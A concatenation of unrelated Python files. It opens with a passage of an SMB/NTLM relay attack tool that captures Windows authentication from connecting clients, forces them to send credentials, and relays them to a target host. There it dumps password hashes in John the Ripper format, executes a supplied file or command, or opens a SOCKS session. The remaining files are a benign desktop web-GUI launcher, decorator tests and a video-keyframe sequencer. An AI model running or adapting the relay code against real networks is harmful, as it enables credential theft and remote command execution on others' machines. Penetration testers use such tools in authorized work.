# TODO: Manage more UIDs for the same session
connData['Uid'] = 10
# Let's store it in the connection data
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
#############################################################
# SMBRelay: Ok, so now the have the Auth token, let's send it
# back to the target system and hope for the best.
smbClient = smbData[self.target]['SMBClient']
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
clientResponse, errorCode = smbClient.sendAuth(connData['CHALLENGE_MESSAGE']['challenge'],
sessionSetupData['SecurityBlob'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
logging.error("Authenticating against %s as %s\\%s FAILED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
# del (smbData[self.target])
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
logging.info("Authenticating against %s as %s\\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible of removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
del (smbData[self.target])
else:
del (smbData[self.target])
clientThread = doAttack(smbClient,self.exeFile,self.command)
clientThread.start()
# Now continue with the server
#############################################################
# Return status code of the authentication process.
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegResult'] = b'\x00'
# Status SUCCESS
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
else:
# Process Standard Security
respParameters = SMBSessionSetupAndXResponse_Parameters()
respData = SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = SMBSessionSetupAndX_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
#############################################################
# SMBRelay
smbClient = smbData[self.target]['SMBClient']
if sessionSetupData['Account'] != '':
clientResponse, errorCode = smbClient.login_standard(sessionSetupData['Account'],
sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'],
sessionSetupData['UnicodePwd'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
return None, [packet], errorCode
# Now continue with the server
else:
# We have a session, create a thread and do whatever we want
ntlm_hash_data = outputToJohnFormat(b'', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible of removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
sessionSetupData['PrimaryDomain'],
sessionSetupData['Account'])).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
else:
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
clientThread = doAttack(smbClient, self.exeFile, self.command)
clientThread.start()
# Now continue with the server
#############################################################
# Do the verification here, for just now we grant access
# TODO: Manage more UIDs for the same session
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
connData['Uid'] = 10
respParameters['Action'] = 0
respData['NativeOS'] = smbServer.getServerOS()
respData['NativeLanMan'] = smbServer.getServerOS()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
# From now on, the client can ask for other commands
connData['Authenticated'] = True
#############################################################
# SMBRelay
smbServer.setConnectionData('SMBRelay', smbData)
#############################################################
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def _start(self):
self.server.serve_forever()
def run(self):
logging.info("Setting up SMB Server")
self._start()
def setTargets(self, targets):
self.target = targets
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Specifies return status after successful relayed authentication to return
# to the connecting client. This comes useful when we don't want the connecting
# client to store successful credentials in his memory. Valid statuses:
# STATUS_SUCCESS - denotes that the connecting client passed valid credentials,
# which will make him store them accordingly.
# STATUS_ACCESS_DENIED - may occur for instance when the client is not a Domain Admin,
# and got configured Remote UAC, thus preventing connection to ADMIN$
# STATUS_LOGON_FAILURE - which will tell the connecting client that the passed credentials
# are invalid.
self.returnStatus = {
'success' : STATUS_SUCCESS,
'denied' : STATUS_ACCESS_DENIED,
'logon_failure' : STATUS_LOGON_FAILURE
}[returnStatus.lower()]
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
# Process command-line arguments.
if __name__ == '__main__':
RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer )
# Init the example's logger theme
logger.init()
print(version.BANNER)
parser = argparse.ArgumentParser(add_help=False,
description="For every connection received, this module will try to SMB relay that "
" connection to the target system or the original client")
parser.add_argument("--help", action="help", help='show this help message and exit')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-h', action='store', metavar='HOST',
help='Host to relay the credentials to, if not it will relay it back to the client')
parser.add_argument('-s', action='store', choices={'success', 'denied', 'logon_failure'}, default='success',
help='Status to return after client performed authentication. Default: "success".')
parser.add_argument('-e', action='store', required=False, metavar='FILE',
help='File to execute on the target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-c', action='store', type=str, required=False, metavar='COMMAND',
help='Command to execute on target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-one-shot', action='store_true', default=False,
help='After successful authentication, only execute the attack once for each target')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html and then execute wmiexec.py '
'again with -codec and the corresponding codec ' % CODEC)
parser.add_argument('-outputfile', action='store',
help='base output filename for encrypted hashes. Suffixes will be added for ntlm and ntlmv2')
parser.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
parser.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
parser.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
if options.codec is not None:
CODEC = options.codec
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
if options.h is not None:
logging.info("Running in relay mode")
mode = 'RELAY'
targetSystem = options.h
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
exeFile = options.e
Command = options.c
returnStatus = options.s
threads = set()
if options.socks is True:
# Start a SOCKS proxy in the background
s1 = SOCKS()
socks_thread = Thread(target=s1.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
for server in RELAY_SERVERS:
s = server(options.outputfile)
s.setTargets(targetSystem)
s.setExeFile(exeFile)
s.setCommand(Command)
s.setSocks(options.socks)
s.setReturnStatus(returnStatus)
s.setMode(mode, options.one_shot)
if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
s.setDomainAccount( options.machine_account, options.machine_hashes, options.domain)
elif (options.machine_account is None and options.machine_hashes is None and options.domain is None) is False:
logging.error("You must specify machine-account/hashes/domain all together!")
sys.exit(1)
s.start()
threads.add(s)
print("")
logging.info("Servers started, waiting for connections")
while True:
try:
sys.stdin.read()
except KeyboardInterrupt:
logging.info('Quitting.. please wait')
if options.socks is True:
s1.shutdown()
for s in threads:
del(s)
sys.exit(1)
else:
pass
|
webgui.py
|
import os
from datetime import datetime
import logging
import tempfile
import subprocess as sps
from threading import Lock, Thread
from scan_system.wsgi import application
logging.basicConfig(
level=logging.INFO, format="flaskwebgui - [%(levelname)s] - %(message)s"
)
def find_chrome_win():
# using edge by default since it's build on chromium
edge_path = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
if os.path.exists(edge_path):
return edge_path
import winreg as reg
reg_path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe"
chrome_path = None
last_exception = None
for install_type in reg.HKEY_CURRENT_USER, reg.HKEY_LOCAL_MACHINE:
try:
reg_key = reg.OpenKey(install_type, reg_path, 0, reg.KEY_READ)
chrome_path = reg.QueryValue(reg_key, None)
reg_key.Close()
except WindowsError as e:
last_exception = e
else:
if chrome_path and len(chrome_path) > 0:
break
# Only log some debug info if we failed completely to find chrome
if not chrome_path:
logging.exception(last_exception)
logging.error("Failed to detect chrome location from registry")
else:
logging.info(f"Chrome path detected as: {chrome_path}")
return chrome_path
def get_default_chrome_path():
"""
Credits for get_instance_path, find_chrome_mac, find_chrome_linux, find_chrome_win funcs
got from: https://github.com/ChrisKnott/Eel/blob/master/eel/chrome.py
"""
return find_chrome_win()
current_timestamp = None
class FlaskUI:
def __init__(
self,
app,
width=800,
height=600,
maximized=False,
fullscreen=False,
browser_path=None,
socketio=None,
on_exit=None,
idle_interval=5,
close_server_on_exit=True,
) -> None:
self.app = app
self.width = str(width)
self.height = str(height)
self.fullscreen = fullscreen
self.maximized = maximized
self.browser_path = browser_path if browser_path else get_default_chrome_path()
self.socketio = socketio
self.on_exit = on_exit
self.idle_interval = idle_interval
self.close_server_on_exit = close_server_on_exit
self.host = "127.0.0.1"
self.port = 8000
self.localhost = f"http://{self.host}:{self.port}"
if self.close_server_on_exit:
self.lock = Lock()
def update_timestamp(self):
self.lock.acquire()
global current_timestamp
current_timestamp = datetime.now()
self.lock.release()
def run(self):
"""
Starts 3 threads one for webframework server and one for browser gui
"""
if self.close_server_on_exit:
self.update_timestamp()
t_start_webserver = Thread(target=self.start_django)
t_open_chromium = Thread(target=self.open_chromium)
t_stop_webserver = Thread(target=self.stop_webserver)
threads = [t_start_webserver, t_open_chromium, t_stop_webserver]
for t in threads:
t.start()
for t in threads:
t.join()
def start_django(self):
try:
import waitress
waitress.serve(self.app, host=self.host, port=self.port)
except ImportError:
os.system(f"python manage.py runserver {self.port}")
def open_chromium(self):
"""
Open the browser selected (by default it looks for chrome)
# https://peter.sh/experiments/chromium-command-line-switches/
"""
logging.info(f"Opening browser at {self.localhost}")
temp_profile_dir = os.path.join(tempfile.gettempdir(), "flaskwebgui")
if self.browser_path:
launch_options = None
if self.fullscreen:
launch_options = ["--start-fullscreen"]
elif self.maximized:
launch_options = ["--start-maximized"]
else:
launch_options = [f"--window-size={self.width},{self.height}"]
options = (
[
self.browser_path,
f"--user-data-dir={temp_profile_dir}",
"--new-window",
"--no-first-run",
# "--window-position=0,0"
]
+ launch_options
+ [f"--app={self.localhost}"]
)
sps.Popen(options, stdout=sps.PIPE, stderr=sps.PIPE, stdin=sps.PIPE)
else:
import webbrowser
webbrowser.open_new(self.localhost)
def stop_webserver(self):
if self.close_server_on_exit is False:
return
# TODO add middleware for Django
logging.info("Middleware not implemented (yet) for Django.")
return
def keep_server_running(self):
self.update_timestamp()
return "Ok"
if __name__ == "__main__":
FlaskUI(application, maximized=True).run()
|
test_decorators.py
|
from threading import Thread
import cProfile, pstats, io, os, errno, signal, time
from functools import wraps
from contextlib import contextmanager
from utilmy.debug import log
def test_all():
"""function test_all
Args:
Returns:
"""
test_decorators()
test_decorators2()
def test_decorators():
"""
#### python test.py test_decorators
"""
from utilmy.decorators import thread_decorator, timeout_decorator, profiler_context,profiler_decorator, profiler_decorator_base
@thread_decorator
def thread_decorator_test():
log("thread decorator")
@profiler_decorator_base
def profiler_decorator_base_test():
log("profiler decorator")
@timeout_decorator(10)
def timeout_decorator_test():
log("timeout decorator")
profiler_decorator_base_test()
timeout_decorator_test()
thread_decorator_test()
def test_decorators2():
"""function test_decorators2
Args:
Returns:
"""
from utilmy.decorators import profiler_decorator, profiler_context
@profiler_decorator
def profiled_sum():
return sum(range(100000))
profiled_sum()
with profiler_context():
x = sum(range(1000000))
print(x)
from utilmy import profiler_start, profiler_stop
profiler_start()
print(sum(range(1000000)))
profiler_stop()
###################################################################################
from utilmy.decorators import timer_decorator
@timer_decorator
def dummy_func():
time.sleep(2)
class DummyClass:
@timer_decorator
def method(self):
time.sleep(3)
dummy_func()
a = DummyClass()
a.method()
########################################################################################################################
########################################################################################################################
def thread_decorator(func):
""" A decorator to run function in background on thread
Return:
background_thread: ``Thread``
"""
@wraps(func)
def wrapper(*args, **kwags):
background_thread = Thread(target=func, args=(*args,))
background_thread.daemon = True
background_thread.start()
return background_thread
return wrapper
########################################################################################################################
class _TimeoutError(Exception):
"""Time out error"""
pass
########################################################################################################################
def timeout_decorator(seconds=10, error_message=os.strerror(errno.ETIME)):
"""Decorator to throw timeout error, if function doesnt complete in certain time
Args:
seconds:``int``
No of seconds to wait
error_message:``str``
Error message
"""
def decorator(func):
def _handle_timeout(signum, frame):
raise _TimeoutError(error_message)
def wrapper(*args, **kwargs):
signal.signal(signal.SIGALRM, _handle_timeout)
signal.alarm(seconds)
try:
result = func(*args, **kwargs)
finally:
signal.alarm(0)
return result
return wraps(func)(wrapper)
return decorator
def timer_decorator(func):
"""
Decorator to show the execution time of a function or a method in a class.
"""
@wraps(func)
def wrapper(*args, **kwargs):
start = time.perf_counter()
result = func(*args, **kwargs)
end = time.perf_counter()
print(f'function {func.__name__} finished in: {(end - start):.2f} s')
return result
return wrapper
########################################################################################################################
@contextmanager
def profiler_context():
"""
Context Manager the will profile code inside it's bloc.
And print the result of profiler.
Example:
with profiler_context():
# code to profile here
"""
from pyinstrument import Profiler
profiler = Profiler()
profiler.start()
try:
yield profiler
except Exception as e:
raise e
finally:
profiler.stop()
print(profiler.output_text(unicode=True, color=True))
def profiler_decorator(func):
"""
A decorator that will profile a function
And print the result of profiler.
"""
@wraps(func)
def wrapper(*args, **kwargs):
from pyinstrument import Profiler
profiler = Profiler()
profiler.start()
result = func(*args, **kwargs)
profiler.stop()
print(profiler.output_text(unicode=True, color=True))
return result
return wrapper
def profiler_decorator_base(fnc):
"""
A decorator that uses cProfile to profile a function
And print the result
"""
def inner(*args, **kwargs):
pr = cProfile.Profile()
pr.enable()
retval = fnc(*args, **kwargs)
pr.disable()
s = io.StringIO()
sortby = "cumulative"
ps = pstats.Stats(pr, stream=s).sort_stats(sortby)
ps.print_stats()
print(s.getvalue())
return retval
return inner
def test0():
"""function test0
Args:
Returns:
"""
with profiler_context():
x = sum(range(1000000))
print(x)
from utilmy import profiler_start, profiler_stop
profiler_start()
print(sum(range(1000000)))
profiler_stop()
@thread_decorator
def thread_decorator_test():
"""function thread_decorator_test
Args:
Returns:
"""
log("thread decorator")
@profiler_decorator_base
def profiler_decorator_base_test():
"""function profiler_decorator_base_test
Args:
Returns:
"""
log("profiler decorator")
@timeout_decorator(10)
def timeout_decorator_test():
"""function timeout_decorator_test
Args:
Returns:
"""
log("timeout decorator")
@profiler_decorator
def profiled_sum():
"""function profiled_sum
Args:
Returns:
"""
return sum(range(100000))
@timer_decorator
def dummy_func():
"""function dummy_func
Args:
Returns:
"""
time.sleep(2)
|
sequencer.py
|
import copy
import threading
import webbrowser
import statistics
from operator import attrgetter, methodcaller
from PySide2.QtGui import *
from PySide2.QtCore import *
from PySide2.QtWidgets import *
from leaguedirector.widgets import *
PRECISION = 10000.0
SNAPPING = 4
OVERLAP = 4
ADJACENT = 0.05
class SequenceKeyframe(QGraphicsPixmapItem):
def __init__(self, api, item, track):
self.pixmapNormal = QPixmap(respath('kfnormal.png'))
self.pixmapOverlap = QPixmap(respath('kfoverlap.png'))
QGraphicsPixmapItem.__init__(self, self.pixmapNormal, track)
self.api = api
self.track = track
self.item = item
self.duplicate = None
self.setCursor(Qt.ArrowCursor)
self.setShapeMode(QGraphicsPixmapItem.BoundingRectShape)
flags = QGraphicsItem.ItemIgnoresTransformations
flags |= QGraphicsItem.ItemIsMovable
flags |= QGraphicsItem.ItemIsSelectable
flags |= QGraphicsItem.ItemSendsGeometryChanges
self.setFlags(flags)
self.setOffset(-10, 3)
self.update()
def viewport(self):
return self.scene().views()[0]
@property
def time(self):
return self.item['time']
@time.setter
def time(self, value):
if self.item['time'] != value:
self.item['time'] = value
self.api.sequence.update()
self.track.updateOverlap()
self.update()
@property
def valueType(self):
value = self.item['value']
if isinstance(value, float):
return 'float'
elif isinstance(value, bool):
return 'bool'
elif isinstance(value, dict):
if 'x' in value and 'y' in value and 'z' in value:
return 'vector'
if 'r' in value and 'g' in value and 'b' in value and 'a' in value:
return 'color'
return ''
@property
def value(self):
return self.item['value']
@value.setter
def value(self, value):
if self.item['value'] != value:
self.item['value'] = value
self.api.sequence.update()
self.update()
@property
def blend(self):
return self.item.get('blend')
@blend.setter
def blend(self, value):
if self.item.get('blend') != value:
self.item['blend'] = value
self.api.sequence.update()
self.update()
def update(self):
self.setPos(int(self.time * PRECISION), 0)
self.setToolTip(self.tooltip())
def tooltip(self):
value = self.value
if isinstance(value, dict):
value = tuple(value.values())
return 'Time: {}\nBlend: {}\nValue: {}'.format(self.time, self.blend, value)
def delete(self):
self.api.sequence.removeKeyframe(self.track.name, self.item)
self.scene().removeItem(self)
def setOverlapping(self, overlapping):
self.setPixmap(self.pixmapOverlap if overlapping else self.pixmapNormal)
def mouseDoubleClickEvent(self, event):
if event.button() == Qt.LeftButton and event.modifiers() == Qt.NoModifier:
if len(self.scene().selectedItems()) < 2:
self.api.playback.pause(self.time)
event.accept()
QGraphicsPixmapItem.mouseDoubleClickEvent(self, event)
def mouseReleaseEvent(self, event):
for key in self.scene().selectedItems():
if isinstance(key, SequenceKeyframe):
key.duplicate = None
QGraphicsPixmapItem.mouseReleaseEvent(self, event)
def itemChange(self, change, value):
if change == QGraphicsItem.ItemPositionChange:
value.setX(self.performSnapping(value.x()))
value.setX(max(0, value.x()))
value.setY(0)
self.performDuplication()
return value
elif change == QGraphicsItem.ItemPositionHasChanged:
if value:
self.time = value.x() / PRECISION
return QGraphicsPixmapItem.itemChange(self, change, value)
def performDuplication(self):
if self.isSelected() and self.duplicate is None:
if QApplication.mouseButtons() == Qt.LeftButton:
if QApplication.keyboardModifiers() == Qt.AltModifier:
self.duplicate = self.track.duplicateKeyframe(self)
def performSnapping(self, time):
if QApplication.mouseButtons() == Qt.LeftButton:
if QApplication.keyboardModifiers() == Qt.NoModifier:
if len(self.scene().selectedItems()) < 2:
scene = self.scene()
viewport = self.viewport()
screenPosition = viewport.mapFromScene(time, 0).x()
left = viewport.mapToScene(screenPosition - SNAPPING, 0).x()
right = viewport.mapToScene(screenPosition + SNAPPING, 0).x()
items = scene.items(left, float(0), right - left, scene.height(), Qt.IntersectsItemBoundingRect, Qt.AscendingOrder)
for item in items:
if isinstance(item, SequenceKeyframe):
if item != self and not item.isSelected() and item.track != self.track:
return item.x()
elif isinstance(item, SequenceTime):
return self.api.playback.time * PRECISION
return time
class SequenceTrack(QGraphicsRectItem):
height = 22
def __init__(self, api, name, index):
QGraphicsRectItem.__init__(self)
self.api = api
self.name = name
self.index = index
self.setPos(0, self.height * self.index)
self.setToolTip(self.api.sequence.getLabel(self.name))
self.setPen(QPen(QColor(70, 70, 70, 255)))
self.updateOverlapTimer = QTimer()
self.updateOverlapTimer.timeout.connect(self.updateOverlapNow)
self.updateOverlapTimer.setSingleShot(True)
self.gradient = QLinearGradient(QPointF(0, 0), QPointF(120 * PRECISION, 0))
self.gradient.setColorAt(0, QColor(30, 30, 30, 255))
self.gradient.setColorAt(0.49999999999999, QColor(30, 30, 30, 255))
self.gradient.setColorAt(0.5, QColor(40, 40, 40, 255))
self.gradient.setColorAt(1, QColor(40, 40, 40, 255))
self.gradient.setSpread(QGradient.RepeatSpread)
self.setBrush(QBrush(self.gradient))
self.reload()
self.update()
def viewport(self):
return self.scene().views()[0]
def paint(self, *args):
self.updateOverlap()
return QGraphicsRectItem.paint(self, *args)
def reload(self):
for item in self.childItems():
if isinstance(item, SequenceKeyframe):
self.scene().removeItem(item)
for item in self.api.sequence.getKeyframes(self.name):
SequenceKeyframe(self.api, item, self)
def addKeyframe(self):
item = self.api.sequence.createKeyframe(self.name)
return SequenceKeyframe(self.api, item, self)
def duplicateKeyframe(self, keyframe):
item = copy.deepcopy(keyframe.item)
self.api.sequence.appendKeyframe(self.name, item)
return SequenceKeyframe(self.api, item, self)
def clearKeyframes(self):
for item in self.childItems():
if isinstance(item, SequenceKeyframe):
item.delete()
def updateOverlapNow(self):
viewport = self.viewport()
distance = viewport.mapToScene(OVERLAP, 0).x() - viewport.mapToScene(0, 0).x()
previous = None
for child in sorted(self.childItems(), key=methodcaller('x')):
if isinstance(child, SequenceKeyframe):
if previous and abs(child.x() - previous.x()) < distance:
child.setOverlapping(True)
previous.setOverlapping(True)
else:
child.setOverlapping(False)
previous = child
def updateOverlap(self):
self.updateOverlapTimer.start(100)
def update(self):
self.setRect(0, 0, int(self.api.playback.length * PRECISION), self.height)
class SequenceHeader(QGraphicsRectItem):
height = 22
def __init__(self, api, name, index, callback):
QGraphicsRectItem.__init__(self)
self.api = api
self.name = name
self.index = index
self.callback = callback
self.setPos(0, self.height * self.index)
self.setRect(0, 0, 160, self.height)
self.setToolTip(self.label())
self.setPen(QPen(Qt.NoPen))
self.setBrush(QColor(20, 20, 50, 255))
self.setFlags(QGraphicsItem.ItemIgnoresTransformations)
self.text = QGraphicsSimpleTextItem(self.label(), self)
self.text.setBrush(QApplication.palette().brightText())
self.text.setPos(145 - self.text.boundingRect().width() - 20, 4)
self.button = QGraphicsPixmapItem(QPixmap(respath('plus.png')), self)
self.button.setPos(140, 4)
self.button.setCursor(Qt.ArrowCursor)
self.button.mousePressEvent = lambda event: self.callback(self.name)
def label(self):
return self.api.sequence.getLabel(self.name)
class SequenceHeaderView(QGraphicsView):
addKeyframe = Signal(str)
def __init__(self, api):
self.api = api
self.scene = QGraphicsScene()
QGraphicsView.__init__(self, self.scene)
self.setFixedWidth(162)
self.setAlignment(Qt.AlignLeft | Qt.AlignTop)
self.setDragMode(QGraphicsView.ScrollHandDrag)
self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
for index, name in enumerate(self.api.sequence.keys()):
self.scene.addItem(SequenceHeader(self.api, name, index, self.addKeyframe.emit))
class SequenceTime(QGraphicsLineItem):
pass
class SequenceTrackView(QGraphicsView):
selectionChanged = Signal()
def __init__(self, api, headers):
self.api = api
self.scene = QGraphicsScene()
QGraphicsView.__init__(self, self.scene)
self.tracks = {}
self.timer = schedule(10, self.animate)
self.scale(1.0 / PRECISION, 1.0)
self.setDragMode(QGraphicsView.NoDrag)
self.setAlignment(Qt.AlignLeft | Qt.AlignTop)
self.setTransformationAnchor(QGraphicsView.AnchorUnderMouse)
self.setSizeAdjustPolicy(QAbstractScrollArea.AdjustToContents)
for index, name in enumerate(self.api.sequence.keys()):
track = SequenceTrack(self.api, name, index)
self.scene.addItem(track)
self.tracks[name] = track
self.time = SequenceTime(0, 1, 0, self.scene.height() - 2)
self.time.setPen(QPen(QApplication.palette().highlight(), 1))
self.time.setFlags(QGraphicsItem.ItemIgnoresTransformations)
self.scene.addItem(self.time)
self.api.playback.updated.connect(self.update)
self.api.sequence.updated.connect(self.update)
self.api.sequence.dataLoaded.connect(self.reload)
headers.addKeyframe.connect(self.addKeyframe)
headers.verticalScrollBar().valueChanged.connect(lambda value: self.verticalScrollBar().setValue(value))
self.verticalScrollBar().valueChanged.connect(lambda value: headers.verticalScrollBar().setValue(value))
self.scene.selectionChanged.connect(self.selectionChanged.emit)
def reload(self):
for track in self.tracks.values():
track.reload()
def selectedKeyframes(self):
return [key for key in self.scene.selectedItems() if isinstance(key, SequenceKeyframe)]
def allKeyframes(self):
return [key for key in self.scene.items() if isinstance(key, SequenceKeyframe)]
def addKeyframe(self, name):
self.tracks[name].addKeyframe()
def clearKeyframes(self):
for track in self.tracks.values():
track.clearKeyframes()
def deleteSelectedKeyframes(self):
for selected in self.selectedKeyframes():
selected.delete()
def selectAllKeyframes(self):
for child in self.allKeyframes():
child.setSelected(True)
def selectAdjacentKeyframes(self):
for selected in self.selectedKeyframes():
for child in self.allKeyframes():
if abs(child.time - selected.time) < ADJACENT:
child.setSelected(True)
def selectNextKeyframe(self):
selectionSorted = sorted(self.selectedKeyframes(), key=attrgetter('time'))
trackSelection = {key.track : key for key in selectionSorted}
for track, selected in trackSelection.items():
for child in sorted(track.childItems(), key=attrgetter('time')):
if child.time > selected.time:
trackSelection[track] = child
break
self.scene.clearSelection()
for item in trackSelection.values():
item.setSelected(True)
def selectPrevKeyframe(self):
selectionSorted = sorted(self.selectedKeyframes(), key=attrgetter('time'), reverse=True)
trackSelection = {key.track : key for key in selectionSorted}
for track, selected in trackSelection.items():
for child in sorted(track.childItems(), key=attrgetter('time'), reverse=True):
if child.time < selected.time:
trackSelection[track] = child
break
self.scene.clearSelection()
for item in trackSelection.values():
item.setSelected(True)
def seekSelectedKeyframe(self):
selected = [key.time for key in self.selectedKeyframes()]
if selected:
self.api.playback.pause(statistics.mean(selected))
def update(self):
for track in self.tracks.values():
track.update()
def mousePressEvent(self, event):
if event.button() == Qt.RightButton:
self.setDragMode(QGraphicsView.ScrollHandDrag)
QGraphicsView.mousePressEvent(self, QMouseEvent(
QEvent.GraphicsSceneMousePress,
event.pos(),
Qt.MouseButton.LeftButton,
Qt.MouseButton.LeftButton,
Qt.KeyboardModifier.NoModifier
))
elif event.button() == Qt.LeftButton:
if event.modifiers() == Qt.ShiftModifier:
self.setDragMode(QGraphicsView.RubberBandDrag)
QGraphicsView.mousePressEvent(self, event)
QGraphicsView.mousePressEvent(self, event)
def mouseDoubleClickEvent(self, event):
QGraphicsView.mouseDoubleClickEvent(self, event)
if not self.scene.selectedItems() and not event.isAccepted():
self.api.playback.pause(self.mapToScene(event.pos()).x() / PRECISION)
def mouseReleaseEvent(self, event):
QGraphicsView.mouseReleaseEvent(self, event)
self.setDragMode(QGraphicsView.NoDrag)
def wheelEvent(self, event):
if event.angleDelta().y() > 0:
self.scale(1.1, 1.0)
else:
self.scale(0.9, 1.0)
def animate(self):
self.time.setPos(self.api.playback.currentTime * PRECISION, 0)
